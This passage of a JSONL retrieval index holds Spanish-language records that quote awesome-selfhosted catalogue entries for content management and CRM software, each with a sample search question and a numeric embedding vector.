0.02022, -0.07751, 0.05452, 0.06632, -0.06865, 0.11891, -0.07693, -0.08234, 0.06014, -0.0197, 0.01438, 0.05514, -0.07917, -0.01235, -0.13845, -0.07185, 0.01629, -0.13962, -0.04953, -0.01939, 0.00241, -0.03175, 0.03659, -0.05784, -0.0157, -0.05074, 0.04415, -0.03059, -0.01736, -0.08495, 0.06784, -0.04989, 0.11588, 0.1293, -0.1026, 0.01244, 0.09266, 0.03795, -0.02789, -0.04058, 0.04623, 0.05783, 0.00983, 0.1238, 0.04503, -0.0133, -0.05142, -0.07156, 0.03343, -0.11914, -0.01893, -0.01612, 0.03836, 0.01443, 0.06205, 0.04418, -0.1185, 0.05737, 0.02533, 0.02087, 0.03252, -0.04491, 0.05238, 0.0086, -0.0491, 0.05964, -0.04336, 0.04712, -0.05806, -0.00298, -0.01056, -0.07355, -0.02331, 0.05388, -0.07888, -0.00952, 0.04081, 0.09001, 0.06049, -0.05962, 0.01878, -0.02889, 0.07098, -0.10394, 0.04184, 0.08092, -0.00688, 0.11471, -0.0872, -0.07209, -0.02608, -0.01845, -0.07839, -0.02855, 0.02652, 0.05405, 0.00577, 0.00651, 0.06523, -0.07142, -0.06779, 0.04893, -0.04093, 0.03413, 0.00625, 0.01602, 0.03873, 0.0654, -0.01292, -0.02073, 0.10854, -0.07111, 0.00719, -0.06988, 0.00336, -0.07424, -0.06163, 0.01479, -0.08416, -0.00011, 0.06606, 0.03313, -0.0613, 0.05052, -0.07094, 0.08642, -0.01709, -0.05617, -0.03166, -0.034, -0.01026, 0.13697, -0.03244, 0.00977, 0.10766, -0.00207, -0.16326, 0.05034, 0.01605, -0.04701, 0.01811, 0.03899, -0.02778, 0.01348, -0.02084, -0.03559, -0.02019, 0.1116, -0.01537, -0.01379, -0.01044, -0.06319, -0.06126, -0.01121, -0.00975, -0.07258, -0.11679, 0.11821, 0.04932, -0.0894, 0.0273, -0.03916, -0.07951, -0.05314, -0.05719, 0.00581, -0.01246, 0.00755, -0.02255, 0.00049, 0.08659, 0.02561, -0.00215, 0.02267, -0.00517, -0.02564, 0.04498, 0.00391, 0.03205, -0.03151, 0.03903, 0.00301, -0.04476, 0.02995, 0.06473, -0.09436, 0.05212, 0.02308, 0.0334, 0.03551, 0.03108, 0.0109, -0.05611, -0.05367, -0.02208, -0.05671, 0.00201, -0.04876, -0.02552, 0.04863, 0.03781, 0.04635, -0.00101, 0.07278, -0.01422, 0.00978, 0.05031, 0.11605, 0.01416, 0.03574, -0.02746, 0.00403, -0.01961, 0.0317, -0.01939, 0.00805, 0.02356, -0.06517, -0.02237, 0.00646, 0.08812, -0.0229, -0.03488, 0.01583, -0.10066, -0.05023, 0.03873, 0.02336, -0.10111, -0.00468, 0.04155, 0.04557, -0.04366, 0.01666, -0.09407]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "quΓ© sistema de gestiΓ³n de contenidos usa Markdown y Twig?", "v": [-0.21668, -0.05041, -0.02613, -0.1406, 0.11504, 0.02054, -0.2475, -0.02527, -0.01542, 0.0069, -0.12192, -0.11989, 0.07186, 0.03275, 0.04049, 0.03632, 0.06006, -0.18333, 0.06798, -0.03351, 0.01051, -0.09299, 0.03452, -0.08482, -0.0025, -0.03141, 0.01532, -0.16381, -0.1012, 0.04582, 0.02597, 0.0284, 0.00327, -0.02373, -0.07255, 0.00557, -0.00014, 0.07693, 0.08108, 0.08059, -0.09684, -0.05869, -0.06909, -0.01517, 0.08908, -0.071, 0.08667, -0.01223, 0.04666, 0.01003, -0.15055, -0.07474, -0.08726, 0.01457, 0.0158, 0.00029, 0.04373, -0.06747, 0.05726, 0.00907, -0.11262, 0.09321, -0.02361, -0.00247, 0.09913, 0.01717, 0.00341, -0.0, 0.04203, 0.16945, 0.11405, -0.06917, 0.10459, -0.10112, 0.04047, 0.04123, 0.10881, 0.06292, -0.08499, -0.00152, 0.00603, 0.01287, -0.07209, 0.12912, -0.12488, 0.0336, -0.05816, -0.05575, -0.07223, -0.01265, 0.03698, -0.05521, -0.03639, -0.00342, -0.04408, -0.02484, -0.06293, -0.05887, 0.02082, 0.02132, 6e-05, 0.00057, -0.05542, 0.0434, -0.05025, 0.05324, 0.07111, -0.08543, 0.01792, 0.04446, -0.00402, 0.02462, -0.0499, -0.00604, -0.1222, 0.06274, 0.00102, 0.0369, -0.0197, 0.05334, -0.09891, 0.04542, 0.06293, -0.07047, 0.1594, 0.03794, 0.0645, 0.03183, 0.00127, -0.01756, 0.08686, -0.02529, -0.09685, -0.01869, 0.04071, -0.02638, -0.00521, 0.08753, -0.03739, -0.05508, -0.0398, 0.00677, -0.00418, 0.04592, 0.12602, -0.02985, 0.04719, -0.06995, -0.02942, 0.07253, -0.0443, -0.00927, -0.01132, -0.15463, 0.0317, 0.00983, -0.02354, -0.05552, -0.04106, -0.03781, -0.06973, -0.02832, -0.08907, 0.04084, -0.05702, -0.03029, -0.00879, 0.03226, 0.00121, -0.0307, 0.04433, 0.08233, -0.00383, -0.05712, 0.03211, -0.06078, -0.06711, -0.11292, -0.0324, 0.00072, -0.03402, -0.05464, -0.00233, 0.03524, -0.03867, -0.02527, -0.06902, 0.01736, 0.02834, 0.02744, 0.00487, 0.03348, 0.01113, -0.06826, 0.03444, 0.00997, -0.05658, -0.03488, -0.03686, 0.0234, -0.08402, 0.03534, 0.07467, -0.05152, -0.04282, 0.04031, 0.07654, 0.00401, 0.04475, 0.03933, -0.00652, 0.03149, -0.01432, -0.00119, -0.05003, 0.08012, -0.02453, 0.0659, -0.01993, -0.06074, -0.02871, -0.02531, -0.01022, 0.03835, -0.02479, -0.07049, 0.00927, 0.00267, -0.01581, -0.05181, -0.01024, -0.07496, 0.03177, 0.02915, -0.05402, -0.08951, -0.07074, -0.01961, -0.03269, -0.06943, -0.0423, 0.08662, 0.04649, -0.00798, -0.01646, 0.00549, -0.0699, 0.00322, -0.01397, -0.07782, -0.02993, -0.004, -0.04534, -0.04091, -0.01435, 0.00273]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "cuΓ‘l es una alternativa libre de Redaxo que soporte Docker?", "v": [-0.01356, -0.02809, -0.02778, 0.09241, -0.02376, -0.01507, -0.03538, -0.09161, -0.05413, -0.06151, -0.17143, -0.24745, -0.0204, -0.1736, 0.15016, -0.11037, 0.0143, -0.01595, 0.08075, -0.01554, 0.03995, -0.05159, -0.14158, -0.08449, 0.19634, -0.02258, 0.0483, -0.00305, 0.0037, 0.05877, 0.09072, -0.07533, 0.00638, -0.00674, -0.0761, 0.07589, 0.15502, -0.01431, 0.10882, 0.00702, -0.04289, -0.02736, 0.03109, 0.00752, -0.00237, -0.03314, -0.0654, 0.02563, 0.00119, 0.09492, 0.00213, -0.1015, -0.04844, -0.05293, -0.00574, -0.06043, 0.1789, -0.11352, -0.04727, -0.00745, -0.0387, 0.06191, 0.00974, 0.00371, -0.00814, 0.01536, -0.06996, 0.0161, -0.02547, 0.09614, 0.03573, 0.00062, 0.11709, 0.04356, -0.0884, 0.11435, -0.02026, 0.0115, -0.01595, 0.05774, 0.05179, 0.03685, 0.00252, 0.08848, 0.02042, -0.11673, 0.09121, -0.186, 0.01266, -0.03888, 0.09371, 0.01806, 0.03566, 0.0841, 0.01289, -0.107, -0.03715, 0.04085, -0.02614, 0.01108, 0.04995, 0.06344, -0.08986, -0.13206, 0.06988, -0.01661, 0.03662, -0.05783, -0.03465, 0.01025, -0.0348, 0.00396, -0.00621, 0.0054, 0.07375, -0.0614, -0.01469, 0.08026, 0.00081, -0.01604, 0.10258, -0.00203, -0.06063, -0.05857, 0.06359, -0.027, 0.02851, 0.04286, 0.00688, -0.01135, 0.00077, -0.0338, -0.03411, -0.04903, -0.11228, 0.07808, 0.02277, 0.00742, 0.03693, -0.0137, 0.02659, 0.02228, -0.00817, -0.05338, 0.03989, 0.01383, 0.03971, 0.03315, 0.03127, -0.00058, -0.05586, 0.02299, -0.01135, 0.05915, -0.07449, 0.00448, 0.05022, -0.0021, -0.03225, 0.15516, 0.01199, -0.12992, -0.01975, -0.03014, -0.05907, -0.01327, 0.02447, -0.05347, -0.02942, 0.01614, -0.03476, 0.04451, 0.01574, -0.03028, -0.07003, -0.12873, 0.03237, -0.13762, 0.03786, -0.09473, 0.04815, -0.01967, -0.01211, 0.02943, 0.02903, -0.12287, 0.00828, -0.03062, 0.03046, 0.01698, -0.02707, 0.01976, -0.02666, -0.05009, 0.02118, -0.00721, 0.0264, -0.05682, 0.01342, 0.02356, -0.10473, -0.03797, -0.03109, -0.05475, -0.02923, 0.01905, -0.10556, 0.09373, -0.01431, 0.05708, 0.00916, 0.04872, 0.04442, 0.00777, -0.0866, -0.00192, 0.07034, 0.00618, 0.04469, -0.06803, 0.11052, 0.01356, 0.00578, 0.04126, -0.0256, 0.02425, 0.05377, -0.005, -0.04948, 0.01442, 0.06212, -0.04736, 0.01591, 0.02307, -0.00763, -0.01866, 0.04858, 0.05931, 0.02239, -0.02185, 0.08372, 0.0732, -0.06849, -0.03736, -0.00172, 0.00936, -0.10451, 0.03242, 0.01781, -0.03122, -0.05984, 0.09722, -0.01495, 0.0007, -0.00371, -0.00052]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "para quΓ© me sirve Strapi si quiero construir una API sin esfuerzo?", "v": [-0.17426, 0.11714, -0.24535, -0.121, -0.0139, -0.04332, 0.04702, -0.17388, -0.03767, -0.03693, -0.02344, 0.00027, -0.07054, -0.03361, 0.13726, -0.02631, 0.07284, 0.03162, 0.06051, 0.10934, 0.01193, -0.04366, -0.10339, -0.00442, 0.06889, -0.01343, 0.09611, -0.00139, -0.18278, -0.01001, -0.07721, 0.10969, 0.07191, -0.04712, 0.00973, -0.00134, -0.05616, 0.03253, -0.06001, 0.06753, 0.029, -0.10942, -0.08809, 0.0652, -0.03334, 0.03414, 0.1814, -0.03078, -0.00444, 0.10161, -0.06721, 0.00131, -0.06131, 0.01319, -0.04389, 0.13158, 0.01554, -0.15136, 0.04763, -0.00084, -0.09435, -0.03886, -0.07385, -0.04572, 0.04258, -0.0141, -0.05936, 0.03442, -0.12556, 0.08683, -0.05112, -0.05144, 0.01761, -0.07441, -0.01393, 0.09318, 0.08297, -0.14046, -0.04405, 0.02013, 0.03991, -0.01, -0.14598, -0.10275, 0.16746, -0.04777, -0.0498, 0.04362, 0.07599, 0.00939, -0.0537, 0.00251, -0.03578, 0.0034, -0.04284, 0.02626, 0.02521, 0.03788, 0.06892, 0.03831, -0.04617, -0.10277, -0.12702, -0.09938, 0.11442, 0.1115, 0.05792, 0.05051, 0.07142, -0.00218, 0.01433, 0.07308, -0.11066, -0.05594, 0.04122, -0.01127, -0.05085, -0.02382, -0.0447, -0.04994, 0.00522, -0.01014, -0.02908, 0.03299, -0.10721, -0.00877, -0.06421, 0.07098, 0.06756, 0.02162, -0.03015, 0.05418, 0.00757, 0.01779, 0.01194, 0.03223, 0.09274, -0.06368, -0.04371, 0.00053, 0.00592, 0.0113, -0.01318, -0.08973, -0.10222, -0.03897, 0.04756, -0.09341, 0.03005, -0.10326, -0.01848, -0.07281, 0.02334, 0.00574, -0.05877, -0.0951, 0.03478, -0.03376, -0.01803, 0.07823, 0.02532, 0.04646, -0.01976, 0.0449, 0.07588, -0.00209, -0.05366, -0.02019, 0.08682, -0.00194, 0.07096, 0.01412, 0.00303, -0.10437, 0.0213, -0.01029, -0.00454, 0.00954, 0.01115, -0.0853, -0.08457, -0.0085, -0.02961, 0.06692, 0.01697, -0.02509, 0.00124, -0.05975, 0.0113, -0.04122, 0.02717, 0.05965, 0.01296, -0.00313, 0.04504, -0.05712, 0.0005, -0.06012, -0.00379, -0.07145, -0.03668, 0.01859, 0.0101, -0.03541, 0.02354, -0.0057, -0.02394, -0.01155, 0.00923, 0.03794, 0.10545, 0.02262, 0.02953, 0.02095, -0.02219, 0.00509, 0.02944, 0.03301, -0.03082, 0.03851, -0.05144, 0.02727, -0.05467, 0.00721, 0.04769, 0.06589, 0.03637, -0.02257, 0.0025, 0.04218, -0.03726, -0.03159, -0.04272, 0.03351, 0.00994, 0.00256, -0.03677, -0.03115, -0.0305, -0.03101, 0.03494, 0.05028, -0.05826, -0.08088, -0.00978, -0.0723, -0.00959, -0.00435, -0.0342, -0.02397, -0.07241, -0.00788, 0.0391, 0.01505, 0.03824, 0.0157]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "quΓ© programa es el mΓ‘s popular para gestionar un blog web?", "v": [-0.05274, 0.11676, -0.01736, -0.13594, -0.06188, -0.06118, -0.0247, -0.03555, -0.04358, -0.12383, -0.04679, -0.09246, -0.01777, -0.02639, 0.01751, -0.01174, 0.08159, -0.12333, 0.12793, 0.07077, -0.10955, 0.1032, -0.02486, -0.05577, -0.05714, -0.07579, 0.01438, -0.00084, -0.02291, 0.08972, -0.03281, -0.05175, -0.0204, -0.07831, -0.02037, 0.13185, 0.12779, 0.01859, 0.04913, 0.01292, -0.10524, -0.08521, -0.05896, -0.01204, 0.03553, 0.00238, 0.08724, -0.08843, 0.03421, -0.11079, -0.05801, -0.02294, 0.02329, 0.05369, 0.06917, -0.02253, -0.06834, -0.22051, -0.09134, -0.00593, -0.0736, 0.10391, 0.00966, 0.035, -0.04479, -0.08891, 0.11608, 0.05579, -0.07155, 0.10448, 0.02579, -0.03995, -0.00228, -0.00123, 0.13378, 0.01387, 0.05045, 0.06432, 0.02855, -0.01613, 0.03348, -0.05279, -0.0219, 0.07297, -0.01872, 0.02873, 0.04314, -0.11245, -0.1338, 0.00166, 0.04608, -0.00709, -0.04037, -0.04953, 0.00464, 0.0162, 0.11534, -0.05947, 0.0361, -0.03131, -0.07749, -0.01008, -0.10866, 0.03401, 0.01627, 0.09136, 0.10427, -0.07577, -0.09612, 0.01469, 0.02668, 0.00574, -0.06324, 0.0062, -0.02487, 0.08045, 0.03304, -0.00637, 0.05465, -0.06752, -0.13376, 0.03672, -0.07458, -0.05312, 0.13273, 0.00655, 0.09464, 0.09506, -0.10112, 0.03885, -0.06825, -0.05741, 0.01945, 0.0022, -0.02449, -0.01814, 0.04206, -0.02457, -0.02523, -0.08904, -0.05479, 0.01234, -0.02583, 0.03538, 0.04947, -0.10215, 0.04024, -0.03301, -0.01491, 0.02919, -0.0064, 0.01565, 0.00305, -0.02428, -0.07558, -0.07427, -0.0499, -0.01266, -0.11641, 0.08525, -0.14392, -0.04107, 0.03443, 0.01745, 0.07092, 0.01914, -0.03757, 0.09418, 0.01532, 0.1063, 0.00471, 0.12755, -0.01369, -0.0308, 0.0533, -0.00249, 0.01928, -0.10291, 0.06525, 0.05629, -0.10148, 0.01203, 0.02616, 0.1368, 0.02612, -0.02356, -0.01014, 0.14135, -0.04943, 0.05151, 0.01547, -0.08893, -0.0076, -0.00763, 0.06369, 0.05268, -0.03395, -0.06403, 0.09768, -0.01288, -0.04535, -0.06304, 0.04051, -0.00625, -0.03918, 0.02661, -0.0095, -0.03835, 0.07487, 0.06642, 0.02562, -0.04343, -0.04933, 0.00168, 0.05312, -0.01152, 0.01053, 0.07917, 0.07403, -0.01242, 0.06921, -0.00798, 0.00275, 0.04587, -0.05398, -0.02971, -0.0223, 0.04199, 0.02287, 0.03708, -0.05458, -0.12881, -0.02687, 0.01363, -0.02304, -0.00115, 0.01722, -0.03709, -0.01855, 0.01855, -0.07369, 0.04748, 0.07778, -0.02738, -0.01518, 0.02116, -0.05016, 0.05718, -0.0083, -0.05036, -0.01301, -0.00552, 0.00482, -0.01091, 0.01048, 0.03089]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "con quΓ© puedo montar una tienda online desde cero sin pagar licencias?", "v": [0.06808, -0.01608, -0.1629, -0.00329, -0.08211, -0.06484, -0.03097, 0.02431, -0.19961, -0.08677, 0.01676, -0.14168, 0.10032, -0.12876, 0.11903, 0.03192, 0.01744, -0.1451, 0.14844, 0.00087, 0.03533, -0.02105, 0.0214, -0.14303, 0.00814, 0.04299, 0.09858, -0.20433, -0.22564, 0.14063, 0.0078, -0.00381, 0.13226, 0.01358, 0.08296, -0.05963, 0.04979, 0.04138, 0.15088, -0.06028, 0.09824, 0.04878, 0.01185, -0.01591, -0.07317, -0.0797, 0.07926, 0.01803, 0.0072, -0.00867, 0.01175, -0.0294, -0.12479, -0.13321, 0.04932, -0.01985, 0.15106, 0.06041, 0.17468, -0.03984, -0.03353, 0.07888, 0.10095, 0.03625, -0.04433, 0.05482, 0.06629, 0.07926, -0.03851, -0.04141, -0.10278, -0.0331, -0.01101, -0.04029, -0.04735, 0.0239, -0.01293, -0.09971, 0.03343, 0.05725, 0.09848, 0.00326, -0.01675, -0.00901, 0.00597, -0.02958, -0.02116, -0.01637, 0.05576, 0.04644, -0.06189, 0.10408, -0.03808, -0.03628, 0.02122, -0.12425, 0.05491, 0.05109, -0.04557, 0.01688, -0.13559, 0.0828, -0.02623, -0.00101, 0.02804, 0.05249, 0.03689, -0.05058, -0.01933, 0.02029, 0.03162, 0.02416, -0.11777, -0.01236, -0.00017, 0.03025, 0.04168, 0.04038, 0.0049, 0.13084, -0.05197, 0.05068, 0.07128, -0.02884, 0.0507, 0.02358, 0.02966, 0.18686, -0.06016, -0.08319, -0.0192, -0.00751, 0.04935, -0.01687, 0.02299, 0.05229, -0.05768, 0.00538, -0.12409, 0.03446, 0.03767, -0.03741, -0.00467, 0.05667, 0.04024, -0.00943, -0.04355, -0.08156, -0.05798, -0.02034, 0.0256, 0.08773, -0.00447, 0.0678, -0.03248, 0.05662, -0.01551, -0.04486, 0.07644, 0.02661, 0.05323, 0.10121, -0.00904, -0.06105, -0.03758, 0.01516, -0.07573, 0.04386, 0.0271, 0.0345, -0.02009, 0.00635, -0.01159, -0.00433, 0.06969, 0.06988, -0.05769, -0.01717, -0.00712, 0.01637, -0.02987, 0.02217, -0.04935, -0.01056, -0.02155, 0.04528, 0.01931, 0.0064, 0.01516, 0.06416, -0.03539, -0.00135, -0.03956, 0.02536, 0.02152, 0.00215, 0.00376, 0.02506, -0.02657, 0.00691, -0.06356, -0.02642, -0.01553, 0.00287, 0.03234, -0.05668, -0.02485, 0.08145, -0.00341, 0.00374, -0.08317, -0.07291, -0.02537, -0.04511, -0.01883, 0.00924, -0.01431, -0.04019, -0.06206, 0.02586, 0.04927, 0.00741, 0.0083, 0.02574, 0.049, 0.01623, 0.01535, 0.03953, 0.02158, 0.02302, -0.03355, -0.01611, -0.05158, -0.04374, 0.00666, -0.01666, 0.03222, 0.04529, -0.05712, 0.03552, 0.00087, 0.05781, 0.03297, -0.01136, 0.01185, -0.05579, -0.0678, -0.03388, -0.04411, -0.04265, -0.02946, 0.03501, -0.01837, 0.01361, -0.02067, 0.00269]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "cual es la alternativa libre a WordPress si prefiero usar Python?", "v": [-0.01125, 0.01662, -0.16981, -0.10939, -0.02951, -0.04425, -0.00673, -0.18488, -0.12124, -0.1055, 0.01784, -0.05508, 0.01585, 0.00883, -0.05343, -0.14031, -0.02542, -0.03907, 0.13658, -0.01464, -0.14119, -0.04652, -0.14097, -0.15695, 0.05853, 0.03606, 0.00829, 0.02365, -0.11727, 0.03644, 0.03714, 0.08416, 0.0354, 0.0745, -0.09762, 0.04883, 0.09579, 0.17085, 0.12448, -0.01634, 0.01889, -0.08333, -0.03925, 0.21943, -0.17984, -0.05372, -0.02321, -0.01878, -0.04678, 0.05461, 0.00306, -0.10954, -0.07455, 0.10048, 0.10788, -0.03942, 0.08974, -0.10596, -0.07738, 0.07595, -0.1424, 0.04867, -0.01129, 0.0457, -0.07516, -0.03803, -0.06247, 0.01941, -0.07473, 0.10743, 0.02886, 0.02314, -0.01084, -0.07315, -0.00355, 0.0976, -0.1028, 0.01477, -0.02236, -0.02014, -0.03003, -0.11129, 0.03174, 0.01296, -0.11608, -0.12775, 0.06075, -0.08405, 0.01629, 0.11957, 0.08482, 0.10355, 0.00789, 0.02699, -0.01047, -0.03438, 0.01427, -0.00404, 0.01483, 0.05609, 0.08338, 0.01299, 0.01773, 0.06675, 0.07526, -0.01363, -0.00815, 0.05672, -0.09462, -0.08911, 0.03995, 0.02574, -0.02132, -0.01546, -0.06012, -0.11085, -0.01763, 0.00378, -0.02895, 0.00142, 0.01269, 0.07284, -0.05719, -0.05302, 0.10085, 0.11333, 0.07342, 0.08391, -0.04103, 0.02574, 0.04522, -0.03361, -0.08016, 0.05205, -0.16241, 0.11096, 0.08528, -0.00038, 0.0395, -0.00872, -0.01713, -0.0147, 0.01007, -0.00954, 0.04284, -0.03801, 0.00141, -0.02931, -0.00435, -0.05042, -0.00077, -0.04847, -0.03101, 0.07735, -0.07454, -0.0103, -0.04479, -0.03568, -0.03028, 0.01086, -0.03722, -0.06855, 0.01243, 0.01216, 0.01115, -0.07165, 0.00187, 0.00606, -0.01151, -0.0251, 0.06718, 0.07044, 0.02559, -0.06654, 0.03395, -0.07739, 0.04494, -0.0306, 0.02729, 0.01709, -0.00183, -0.00595, -0.10292, -0.01794, 0.03878, -0.01337, 0.01002, 0.04479, -0.04288, 0.04389, -0.07078, 0.05671, 0.03045, -0.07414, 0.00124, 0.00513, 0.01806, -0.03595, 0.04447, -0.01195, 0.00125, 0.00815, -0.04053, -0.00404, 0.03785, 0.01332, -0.04735, -0.02956, 0.0386, -0.01871, 0.01102, -0.02619, 0.01737, 0.01805, 0.04346, -0.04311, -0.00452, 0.02345, 0.03339, -0.00743, -0.01911, 0.05848, 0.04493, 0.01995, 0.02525, 0.02357, 0.02191, 0.02384, 0.01765, 0.03821, -0.07042, -0.03145, -0.01512, 0.02653, -0.00354, -0.03442, 0.00767, -0.00081, -0.02387, -0.00175, 0.03812, 0.08462, -0.03007, -0.04656, -0.0224, 0.00235, -0.08915, 0.00204, -0.05633, -0.02639, 0.00048, 0.03188, -0.02368, -0.04335, -0.02384, 0.06657]} -{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "que programa de CRM sirve para gestionar la vida personal con amigos y familia", "v": [-0.06787, 0.03671, 0.01588, -0.21692, -0.00641, -0.13982, 0.01015, 0.06164, 0.05026, -0.19837, 0.05619, -0.12768, 0.07905, -0.1098, 0.05733, -0.00268, 0.11416, 0.06705, 0.04232, 0.07367, -0.00697, 0.0503, -0.00479, 0.00526, -0.12709, -0.02285, 0.12686, -0.1128, -0.01139, 0.08022, 0.08329, -0.01513, 0.09302, -0.08216, 0.06257, 0.07027, -0.02037, 0.06727, -0.05007, -0.00168, 0.03877, -0.01514, 0.06743, 0.10386, 0.12471, 0.08503, 0.06165, -0.07411, -0.01934, -0.01853, -0.20484, -0.00601, 0.01117, -0.09232, -0.05522, 0.00761, -0.118, -0.12248, -0.02199, 0.05312, 